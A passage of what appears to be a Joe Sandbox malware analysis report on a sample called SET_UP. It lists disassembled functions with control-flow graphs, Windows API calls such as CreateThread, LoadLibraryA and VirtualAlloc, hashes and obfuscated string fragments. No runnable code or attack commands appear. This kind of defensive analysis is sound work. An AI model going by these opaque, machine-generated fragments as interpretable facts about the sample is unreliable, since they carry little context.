                                                                                                  • Instruction Fuzzy Hash: 5612F4B0E00219DFDB14CF99C990BADBBB1FF88304F2082A9E915AB385D7346A45CF54
                                                                                                  Function 009509C9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 271 9509c9-950a20 GetPEB 272 950a2b-950a2f 271->272 273 950a35-950a40 272->273 274 950acf-950ad6 272->274 276 950a46-950a5d 273->276 277 950aca 273->277 275 950ae1-950ae5 274->275 279 950ae7-950af4 275->279 280 950af6-950afd 275->280 281 950a82-950a9a CreateThread 276->281 282 950a5f-950a80 276->282 277->272 279->275 284 950b06-950b0b 280->284 285 950aff-950b01 280->285 286 950a9e-950aa6 281->286 282->286 285->284 286->277 288 950aa8-950ac5 286->288 288->277
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00950A95
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID: ,
                                                                                                  • API String ID: 2422867632-3772416878
                                                                                                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                  • Instruction ID: bb0bcc1aaf81e4ec901ac897a9d6a42235cfe2b6e2cf0970da63624c5f712e94
                                                                                                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                  • Instruction Fuzzy Hash: DD41E574A00209EFDB04CF99C994BAEB7B1FF88305F208598E9156B381D375AE85CF94
                                                                                                  Function 009A5647 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 290 9a5647-9a565a 291 9a565c-9a565f 290->291 292 9a5672-9a567c 290->292 295 9a5661-9a5664 291->295 293 9a568b-9a5697 292->293 294 9a567e-9a5686 292->294 296 9a569a-9a569f 293->296 294->293 295->292 297 9a5666-9a5670 295->297 298 9a56d2-9a56d9 LoadLibraryA 296->298 299 9a56a1-9a56ac 296->299 297->292 297->295 302 9a56dc-9a56e0 298->302 300 9a56c8-9a56cc 299->300 301 9a56ae-9a56c6 call 9a5d15 299->301 300->296 304 9a56ce-9a56d0 300->304 301->300 306 9a56e1-9a56e3 301->306 304->298 304->302 306->302
                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 009A56D9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad
                                                                                                  • String ID: .dll
                                                                                                  • API String ID: 1029625771-2738580789
                                                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                  • Instruction ID: a75a44fb389ce7d8f25635b4ea8a4eac2e73cd7aa06676fb9bb685bceb1f6686
                                                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                  • Instruction Fuzzy Hash: 2521E472700A859FEB21CF68C844A697BA8FF02324F5A456CE8028BA51D730EC458BC0
                                                                                                  Function 009A4299 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 307 9a4299-9a42fd call 9a5840 * 3 314 9a42ff-9a4301 307->314 315 9a4327 307->315 314->315 317 9a4303-9a4305 314->317 316 9a432a-9a4334 315->316 317->315 318 9a4307-9a4319 VirtualAlloc 317->318 319 9a431b-9a4322 318->319 320 9a4335-9a4358 call 9a5cb5 call 9a5cd9 318->320 319->315 322 9a4324 319->322 326 9a435a-9a4390 call 9a59ad call 9a5883 320->326 327 9a43a2-9a43bb call 9a5840 320->327 322->315 338 9a45f1-9a45fa 326->338 339 9a4396-9a439c 326->339 327->315 332 9a43c1 327->332 334 9a43c7-9a43cd 332->334 336 9a4409-9a4412 334->336 337 9a43cf-9a43d5 334->337 341 9a446b-9a4476 336->341 342 9a4414-9a441a 336->342 340 9a43d7-9a43da 337->340 343 9a45fc-9a45ff 338->343 344 9a4601-9a4609 338->344 339->327 339->338 347 9a43ee-9a43f0 340->347 348 9a43dc-9a43e1 340->348 345 9a4478-9a4481 call 9a358d 341->345 346 9a448f-9a4492 341->346 349 9a441e-9a4439 call 9a5840 342->349 343->344 350 9a4638 343->350 344->350 351 9a460b-9a4636 call 9a5cd9 344->351 358 9a45ed 345->358 369 9a4487-9a448d 345->369 357 9a4498-9a44a1 346->357 346->358 347->336 356 9a43f2-9a4400 call 9a5647 347->356 348->347 355 9a43e3-9a43ec 348->355 367 9a443b-9a4443 349->367 368 9a4458-9a4469 349->368 354 9a463c-9a465c call 9a5cd9 VirtualFree 350->354 351->354 378 9a465e 354->378 379 9a4662-9a4664 354->379 355->340 355->347 371 9a4405-9a4407 356->371 364 9a44a3 357->364 365 9a44a7-9a44ae 357->365 358->338 364->365 372 9a44de-9a44e2 365->372 373 9a44b0-9a44b9 call 9a3429 365->373 367->358 374 9a4449-9a4452 367->374 368->341 368->349 369->365 371->334 376 9a44e8-9a450a 372->376 377 9a4584-9a4587 372->377 387 9a44bb-9a44c1 373->387 388 9a44c7-9a44d0 call 9a3524 373->388 374->358 374->368 376->358 393 9a4510-9a4523 call 9a5cb5 376->393 381 9a45d9-9a45db call 9a49c9 377->381 382 9a4589-9a458c 377->382 378->379 379->316 392 9a45e0-9a45e1 381->392 382->381 384 9a458e-9a4591 382->384 390 9a45aa-9a45bb call 9a408a 384->390 391 9a4593-9a4595 384->391 387->358 387->388 388->372 399 9a44d2-9a44d8 388->399 405 9a45cc-9a45d7 call 9a3b56 390->405 406 9a45bd-9a45c9 call 9a4669 390->406 391->390 395 9a4597-9a459a 391->395 396 9a45e2-9a45e9 392->396 408 9a4547-9a4580 393->408 409 9a4525-9a4529 393->409 400 9a459c-9a459f 395->400 401 9a45a1-9a45a8 call 9a5237 395->401 396->358 402 9a45eb 396->402 399->358 399->372 400->396 400->401 401->392 402->402 405->392 406->405 408->358 418 9a4582 408->418 409->408 413 9a452b-9a452e 409->413 413->377 417 9a4530-9a4545 call 9a5ab8 413->417 417->418 418->377
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009A4313
                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 009A4657
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AllocFree
                                                                                                  • String ID:
                                                                                                  • API String ID: 2087232378-0
                                                                                                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                  • Instruction ID: 4f0eb0b79576af0244366c2abe0760992bab92e518ac9ddeacd5b5230cfabbc3
                                                                                                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                  • Instruction Fuzzy Hash: 30B1F371600B02EBDB219E60CC81BA7B7ECFF8B314F140529F99986151EBB5E950DBE1

                                                                                                  Non-executed Functions

                                                                                                  Function 0097656C Relevance: 110.4, Strings: 88, Instructions: 367COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 421 97656c-976690 422 976695-9766a0 421->422 422->422 423 9766a2 422->423 424 9766a4-9766a7 423->424 425 9766e2-97670a 424->425 426 9766a9-9766e0 424->426 427 97670c-97670f 425->427 426->424 428 976753-9767c0 427->428 429 976711-976751 427->429 430 9767c5-9767d3 428->430 429->427 430->430 431 9767d5 430->431 432 9767d7-9767da 431->432 433 976802-976b47 call 95ac86 * 5 432->433 434 9767dc-976800 432->434 445 976b4c-976b5a 433->445 434->432 445->445 446 976b5c 445->446 447 976b5e-976b61 446->447 448 976b63-976b7e 447->448 449 976b80-976bd2 447->449 448->447 450 976bd7-976be5 449->450 450->450 451 976be7 450->451 452 976be9-976bec 451->452 453 976bee-976c09 452->453 454 976c0b-976c6c call 966776 * 2 call 95d396 452->454 453->452
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $ $ $"$$$$$%$%$&$'$($*$*$+$,$-$.$.$/$/$0$2$2$3$4$4$6$6$8$:$;$<$>$?$@$@$B$D$D$F$H$H$J$K$K$K$L$L$L$N$P$P$R$S$T$U$V$V$W$X$Y$Z$[$\$\$\$^$d$e$f$g$h$j$l$m$n$n$t$t$u$w$y$z${$|$}$~$~
                                                                                                  • API String ID: 0-1852530521
                                                                                                  • Opcode ID: 6387563601b03344c1c6328616388ea1876f316e2469d9acc14d63fac05655dc
                                                                                                  • Instruction ID: dcade0c40b4240bdbebbf5fe2ea62d9e1f9769e2ed22071664ddb17e1d562508
                                                                                                  • Opcode Fuzzy Hash: 6387563601b03344c1c6328616388ea1876f316e2469d9acc14d63fac05655dc
                                                                                                  • Instruction Fuzzy Hash: 4522EF2080C7D9C9DB32C67C9C497DDBFA11B27324F0847D8D5E86B2D2D2790A89DB66
                                                                                                  Function 00964336 Relevance: 99.5, Strings: 78, Instructions: 1973COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $ $!$!$"$#$$$%$%$&$'$'$($($($)$)$*$*$*$,$-$.$.$.$.$/$1$4$4$6$7$:$;$>$@$B$C$D$D$D$D$D$I$J$J$M$O$S$T$[$\$]$`$e$f$h$i$i$j$l$l$m$m$m$n$o$p$q$r$x$y$y$|$|$}$}$~
                                                                                                  • API String ID: 0-426187509
                                                                                                  • Opcode ID: f68d6b00179b0507484bffa4a2ad5d876588dcf58b440864c378117cdbbac513
                                                                                                  • Instruction ID: 92e518ba0a5aaa24aefb6e16df98e698f0963bca2223b1671b725ba5ea90773b
                                                                                                  • Opcode Fuzzy Hash: f68d6b00179b0507484bffa4a2ad5d876588dcf58b440864c378117cdbbac513
                                                                                                  • Instruction Fuzzy Hash: 2803BC7150C7C18AD3349B3888883AFBFD1AB96324F188E6DE4E9873D2D77985458B53
                                                                                                  Function 0098D8CE Relevance: 30.2, Strings: 24, Instructions: 230COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 950 98d8ce-98da8c 951 98da91-98da9f 950->951 951->951 952 98daa1 951->952 953 98daa3-98daa6 952->953 954 98daa8-98dae7 953->954 955 98dae9-98db26 953->955 954->953 956 98db28-98db30 955->956 957 98db32-98db44 956->957 958 98db46-98dbe0 956->958 957->956 959 98dbe5-98dbf3 958->959 959->959 960 98dbf5 959->960 961 98dbf7-98dbfa 960->961 962 98dbfc-98dc5e 961->962 963 98dc60-98dc94 961->963 962->961 964 98dc96-98dc9e 963->964 965 98dca0-98dcb2 964->965 966 98dcb4-98dd01 964->966 965->964
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $"$$$&$,$.$/$8$:$<$>$j$k$l$m$m$n$t$v$v$z${${${
                                                                                                  • API String ID: 0-3828528821
                                                                                                  • Opcode ID: dbd49799df778e91aeafa61c40d22269fad0fb97f3d7929a49da28dfe46e673a
                                                                                                  • Instruction ID: 4c7bfdf26f779db833369ed358a9c3ad8c605c8da88a5106e19563f8a77b9170
                                                                                                  • Opcode Fuzzy Hash: dbd49799df778e91aeafa61c40d22269fad0fb97f3d7929a49da28dfe46e673a
                                                                                                  • Instruction Fuzzy Hash: A0C16231908BE98ADB36C63C9C583C9AFA15B67324F0843D8D1E96B3D2C6750F86CB55
                                                                                                  Function 00962AC1 Relevance: 18.3, Strings: 14, Instructions: 848COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 967 962ac1-962adf 968 962ae4-962af2 967->968 968->968 969 962af4-962af8 968->969 970 962afa-962afd 969->970 971 962b55-962b8c call 953156 970->971 972 962aff-962b53 970->972 975 962b91-962b9f 971->975 972->970 975->975 976 962ba1-962ba3 975->976 977 962ba7-962baa 976->977 978 962bac-962bc7 977->978 979 962bc9-962bef call 953156 977->979 978->977 982 962bf3-962bf7 979->982 983 962bf1-962c30 call 966386 979->983 985 9636b9 982->985 990 962c34-962c7b call 959a66 call 95c426 983->990 991 962c32 983->991 986 96430a 985->986 989 96430c-964321 call 9537e6 986->989 998 960cd5-960d03 call 9537f6 989->998 999 960ccc-964332 989->999 1003 962c80-962c8e 990->1003 991->990 1007 960d08-960d16 998->1007 1003->1003 1006 962c90 1003->1006 1009 962c92-962c95 1006->1009 1007->1007 1008 960d18-960d1c 1007->1008 1010 960d1e-960d21 1008->1010 1011 962c97-962ce3 1009->1011 1012 962ce5-962d03 call 953156 1009->1012 1014 960d23-960d8e 1010->1014 1015 960d90-960dfa call 9536e6 1010->1015 1011->1009 1018 962da9-962de3 call 966386 1012->1018 1019 962d09-962d81 call 966386 1012->1019 1014->1010 1022 960dfe-960e02 1015->1022 1023 960dfc-960e25 1015->1023 1031 962de7-962e74 call 959a66 call 95c426 1018->1031 1032 962de5 1018->1032 1028 962d85-962da4 call 959a66 call 95c426 1019->1028 1029 962d83 1019->1029 1022->989 1030 960e2a-960e38 1023->1030 1028->1018 1029->1028 1030->1030 1035 960e3a 1030->1035 1048 962e79-962e84 1031->1048 1032->1031 1038 960e3c-960e3f 1035->1038 1041 960e91-960ee0 call 953256 1038->1041 1042 960e41-960e8f 1038->1042 1041->986 1046 960ee6 1041->1046 1042->1038 1046->986 1048->1048 1049 962e86 1048->1049 1050 962e88-962e8b 1049->1050 1051 962ecc-962ed9 1050->1051 1052 962e8d-962eca 1050->1052 1053 962edd-962eeb call 959a76 1051->1053 1054 962edb-962f09 1051->1054 1052->1050 1053->985 1057 962f0d-962f5a call 959a66 1054->1057 1058 962f0b 1054->1058 1064 962f5c-962f74 call 959a76 * 2 1057->1064 1065 962f79-962fa5 call 959a76 1057->1065 1058->1057 1080 9636b7 1064->1080 1072 962faa-962fb8 1065->1072 1072->1072 1074 962fba-962fbe 1072->1074 1076 962fc0-962fc3 1074->1076 1078 962fc5-96300a 1076->1078 1079 96300c-96303a call 953156 1076->1079 1078->1076 1084 96303e-963071 call 966386 1079->1084 1085 96303c 1079->1085 1080->985 1092 963075-963099 call 959a66 call 95c426 1084->1092 1093 963073 1084->1093 1086 96309e-9630b8 1085->1086 1088 9630bb-9630be 1086->1088 1090 9630c0-9630df 1088->1090 1091 9630e1-963127 call 953456 1088->1091 1090->1088 1099 96312c-96313a 1091->1099 1092->1086 1093->1092 1099->1099 1100 96313c 1099->1100 1101 96313e-963141 1100->1101 1102 9631c7-9631ec call 953366 1101->1102 1103 963147-9631c2 1101->1103 1106 963595-96361e call 95a596 call 967246 call 95b146 1102->1106 1107 9631f2-96323a call 9537e6 1102->1107 1103->1101 1122 963620-963634 1106->1122 1123 96365e-963689 call 959a76 * 2 1106->1123 1113 96323e-96325b call 959a66 1107->1113 1114 96323c 1107->1114 1120 96327f-963281 1113->1120 1121 96325d-963269 1113->1121 1114->1113 1125 963283-96328f 1120->1125 1124 96326b-963277 call 966466 1121->1124 1127 963636-96363c 1122->1127 1128 963652-96365a call 959a76 1122->1128 1156 963695-96369f 1123->1156 1157 96368b-963693 call 959a76 1123->1157 1141 963279-96327d 1124->1141 1130 9632a3-9632d5 call 9537f6 1125->1130 1131 963291-96329e 1125->1131 1140 96363e-96364e call 9665e6 1127->1140 1128->1123 1143 9632da-9632e5 1130->1143 1131->1106 1151 963650 1140->1151 1141->1120 1143->1143 1146 9632e7 1143->1146 1149 9632e9-9632ec 1146->1149 1152 9632ee-963316 1149->1152 1153 963318-96334e call 953156 1149->1153 1151->1128 1152->1149 1163 963355-963358 1153->1163 1160 9636a1-9636a9 call 959a76 1156->1160 1161 9636ab-9636b2 call 95a676 1156->1161 1157->1156 1160->1161 1161->1080 1166 963394-9633d9 call 953156 1163->1166 1167 96335a-963392 1163->1167 1171 9633de-9633ec 1166->1171 1167->1163 1171->1171 1172 9633ee-9633f0 1171->1172 1173 9633f4-9633f7 1172->1173 1174 96341f-963468 call 953456 1173->1174 1175 9633f9-96341d 1173->1175 1178 96346d-96347b 1174->1178 1175->1173 1178->1178 1179 96347d 1178->1179 1180 96347f-963482 1179->1180 1181 963513-963590 call 953456 call 966486 1180->1181 1182 963488-96350e 1180->1182 1181->1125 1182->1180
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %$1$<$>$@$C$M$N$Q$R$Y$i$v$}
                                                                                                  • API String ID: 0-4071272931
                                                                                                  • Opcode ID: b84c29f9d0a2ea2ec2f58870ac9baa18fd95e5e539783611f234c28677e2a37d
                                                                                                  • Instruction ID: 71f32f71c817aa9d3c806da89ac49ffdb777388386001c616ee0b02f5f9c0441
                                                                                                  • Opcode Fuzzy Hash: b84c29f9d0a2ea2ec2f58870ac9baa18fd95e5e539783611f234c28677e2a37d
                                                                                                  • Instruction Fuzzy Hash: 3962C67260C7808BD724DB39C8953AEBBD1ABD5324F198E3DD4E9C73C2D67989058B42
                                                                                                  Function 0095ACA6 Relevance: 12.9, Strings: 10, Instructions: 406COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1191 95aca6-95ad29 1192 95ad36-95ad5a 1191->1192 1192->1192 1193 95ad5c-95ad88 1192->1193 1194 95ad96-95ade4 1193->1194 1194->1194 1195 95ade6-95ae8e 1194->1195 1196 95ae96-95aebf 1195->1196 1196->1196 1197 95aec1-95aee5 1196->1197 1198 95aee6-95aefa 1197->1198 1198->1198 1199 95aefc-95af05 1198->1199 1200 95af07-95af0d 1199->1200 1201 95af21-95af31 1199->1201 1202 95af16-95af1f 1200->1202 1203 95af41-95af4b 1201->1203 1204 95af33 1201->1204 1202->1201 1202->1202 1206 95af61-95af69 1203->1206 1207 95af4d-95af51 1203->1207 1205 95af36-95af3f 1204->1205 1205->1203 1205->1205 1209 95af81-95af8b 1206->1209 1210 95af6b-95af6c 1206->1210 1208 95af56-95af5f 1207->1208 1208->1206 1208->1208 1212 95afa1-95afaf 1209->1212 1213 95af8d-95af91 1209->1213 1211 95af76-95af7f 1210->1211 1211->1209 1211->1211 1215 95afc1-95b002 1212->1215 1216 95afb1-95afb5 1212->1216 1214 95af96-95af9f 1213->1214 1214->1212 1214->1214 1218 95b004-95b00a 1215->1218 1219 95b00b-95b037 1215->1219 1217 95afb6-95afbf 1216->1217 1217->1215 1217->1217 1218->1219 1220 95b046-95b05a 1219->1220 1220->1220 1221 95b05c-95b08b 1220->1221 1222 95b096-95b0bc 1221->1222 1222->1222 1223 95b0be-95b0c5 1222->1223 1224 95b0c7-95b0cb 1223->1224 1225 95b0e1-95b0ea 1223->1225 1228 95b0d6-95b0df 1224->1228 1226 95b101-95b10b 1225->1226 1227 95b0ec-95b0ef 1225->1227 1230 95b121-95b136 1226->1230 1231 95b10d-95b111 1226->1231 1229 95b0f6-95b0ff 1227->1229 1228->1225 1228->1228 1229->1226 1229->1229 1232 95b116-95b11f 1231->1232 1232->1230 1232->1232
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 9$AAEK$Z\TD$e*5p$hnt3$lc$up`x$x|~e$zdxe${}iC
                                                                                                  • API String ID: 0-759793530
                                                                                                  • Opcode ID: cb13b8974df6869f289ae0a457d5da0007fd8798e881765fde2594904bb889c9
                                                                                                  • Instruction ID: 4301636a97efe3617d568e95992f9abf73193159bcf6b018cc761b7ad35a0478
                                                                                                  • Opcode Fuzzy Hash: cb13b8974df6869f289ae0a457d5da0007fd8798e881765fde2594904bb889c9
                                                                                                  • Instruction Fuzzy Hash: 02C1C27150C3A18BD322CF2A856035BFFE0AF97701F18895DE8D54B282D779890ACB97
                                                                                                  Function 00971B4F Relevance: 12.9, Strings: 10, Instructions: 360COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1233 971b4f-971b5a 1234 971bac-971be3 1233->1234 1235 971b5c-971ba8 1233->1235 1236 971be6-971bf0 1234->1236 1235->1234 1236->1236 1237 971bf2 1236->1237 1238 971bf4-971bf7 1237->1238 1239 971bf9-971c36 1238->1239 1240 971c38-971cb5 call 966786 1238->1240 1239->1238 1243 971cba-971cc4 1240->1243 1243->1243 1244 971cc6 1243->1244 1245 971cc8-971ccb 1244->1245 1246 971cfe-971da3 call 966786 1245->1246 1247 971ccd-971cfc 1245->1247 1250 971da5-971da8 1246->1250 1247->1245 1251 971df0-971e83 call 966786 1250->1251 1252 971daa-971dee 1250->1252 1255 971e88-971e92 1251->1255 1252->1250 1255->1255 1256 971e94 1255->1256 1257 971e96-971e99 1256->1257 1258 971ec6-971f8e call 966786 1257->1258 1259 971e9b-971ec4 1257->1259 1262 971f93-971f9d 1258->1262 1259->1257 1262->1262 1263 971f9f 1262->1263 1264 971fa1-971fa4 1263->1264 1265 971fa6-971ff9 1264->1265 1266 971ffb-97202a call 966786 1264->1266 1265->1264
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: A$I$M$O$S$c$p${${$|
                                                                                                  • API String ID: 0-348498607
                                                                                                  • Opcode ID: b08a2b5b93a794a8c505335190856fff263884b131eaa54648fe97f0391aa272
                                                                                                  • Instruction ID: f62dae6a8a3a451b440391e3034ed988501d8648d3e1f398cb6432b259bc5efb
                                                                                                  • Opcode Fuzzy Hash: b08a2b5b93a794a8c505335190856fff263884b131eaa54648fe97f0391aa272
                                                                                                  • Instruction Fuzzy Hash: EB024821508BC28ED7268A3C8848756BF916B67228F1CC7DDE4F94F7D3C266D506C7A2
                                                                                                  Function 0098E876 Relevance: 12.2, Strings: 9, Instructions: 903COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1269 98e876-98e89d 1270 98e8a6-98e8c4 1269->1270 1270->1270 1271 98e8c6-98e8e7 1270->1271 1272 98e8f6-98e92e 1271->1272 1272->1272 1273 98e930-98e995 1272->1273 1274 98e996-98e9f3 1273->1274 1274->1274 1275 98e9f5-98ea1a 1274->1275 1277 98ea20-98ea2f 1275->1277 1278 98eac3-98eae9 1275->1278 1279 98ea36-98ea4a 1277->1279 1280 98eaf6-98eb33 1278->1280 1279->1279 1281 98ea4c-98ea7c 1279->1281 1280->1280 1282 98eb35-98eba5 1280->1282 1283 98ea86-98eab4 1281->1283 1284 98eba6-98ebce 1282->1284 1283->1283 1285 98eab6-98eabb 1283->1285 1284->1284 1286 98ebd0-98ec35 1284->1286 1285->1278 1287 98ec36-98ec8c 1286->1287 1287->1287 1288 98ec8e-98ece0 1287->1288 1290 98f246-98f279 call 995456 1288->1290 1291 98ece6-98ed3a 1288->1291 1298 98f27b-98f27f 1290->1298 1299 98f283-98f285 1290->1299 1292 98ed46-98ed78 1291->1292 1292->1292 1294 98ed7a-98eda5 1292->1294 1304 98edab-98edc5 1294->1304 1305 98f235-98f242 1294->1305 1298->1299 1300 98f2a3-98f2ae 1299->1300 1302 98f2ba-98f2e5 1300->1302 1303 98f2b0-98f2b7 1300->1303 1306 98f2e6-98f333 1302->1306 1303->1302 1311 98f22b-98f231 1304->1311 1312 98edcb-98edfb 1304->1312 1305->1290 1306->1306 1307 98f335-98f38a 1306->1307 1310 98f396-98f3b5 1307->1310 1310->1310 1313 98f3b7-98f3dc call 96f2f6 1310->1313 1311->1305 1314 98ee06-98ee24 1312->1314 1318 98f3e6-98f3ee 1313->1318 1314->1314 1316 98ee26-98eea5 1314->1316 1320 98eea6-98eeba 1316->1320 1318->1318 1321 98f3f0-98f3f2 1318->1321 1320->1320 1324 98eebc-98eede 1320->1324 1322 98f3f8-98f408 call 959ae6 1321->1322 1323 98f296-98f29d 1321->1323 1322->1323 1323->1300 1326 98f40d-98f414 1323->1326 1330 98f218-98f227 1324->1330 1331 98eee4-98ef0a 1324->1331 1330->1311 1334 98f20a-98f214 1331->1334 1335 98ef10-98ef13 1331->1335 1334->1330 1335->1334 1337 98ef19-98ef1e 1335->1337 1337->1334 1339 98ef24-98ef89 1337->1339 1341 98ef96-98efba 1339->1341 1341->1341 1342 98efbc-98efd0 1341->1342 1344 98f1f9-98f206 1342->1344 1345 98efd6-98efdf 1342->1345 1344->1334 1345->1344 1346 98efe5-98eff2 1345->1346 1347 98f033-98f035 1346->1347 1348 98eff4-98effb 1346->1348 1351 98f037-98f051 call 959a66 1347->1351 1350 98f012-98f016 1348->1350 1352 98f018-98f021 1350->1352 1353 98f006 1350->1353 1359 98f1a8-98f1b9 1351->1359 1360 98f057-98f063 1351->1360 1356 98f028-98f02c 1352->1356 1357 98f023-98f026 1352->1357 1355 98f007-98f010 1353->1355 1355->1350 1355->1351 1356->1355 1361 98f02e-98f031 1356->1361 1357->1355 1363 98f1bb 1359->1363 1364 98f1c0-98f1cf 1359->1364 1360->1359 1362 98f069-98f071 1360->1362 1361->1355 1365 98f076-98f082 1362->1365 1363->1364 1366 98f1d1 1364->1366 1367 98f1d6-98f1f6 call 959a96 call 959a76 1364->1367 1368 98f084-98f089 1365->1368 1369 98f096-98f09c 1365->1369 1366->1367 1367->1344 1371 98f156-98f15a 1368->1371 1372 98f0be-98f0cc 1369->1372 1373 98f09e-98f0a1 1369->1373 1379 98f15c-98f162 1371->1379 1376 98f16e-98f177 1372->1376 1377 98f0d2-98f0d5 1372->1377 1373->1372 1375 98f0a3-98f0b9 1373->1375 1375->1371 1376->1379 1383 98f179-98f17c 1376->1383 1377->1376 1380 98f0db-98f155 1377->1380 1379->1359 1382 98f164-98f166 1379->1382 1380->1371 1382->1365 1386 98f16c 1382->1386 1384 98f17e-98f1a2 1383->1384 1385 98f1a4-98f1a6 1383->1385 1384->1371 1385->1371 1386->1359
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: A%8$!rsp$\L$dvs$dvs$hi$qU%W$rkde$y>
                                                                                                  • API String ID: 0-2349886934
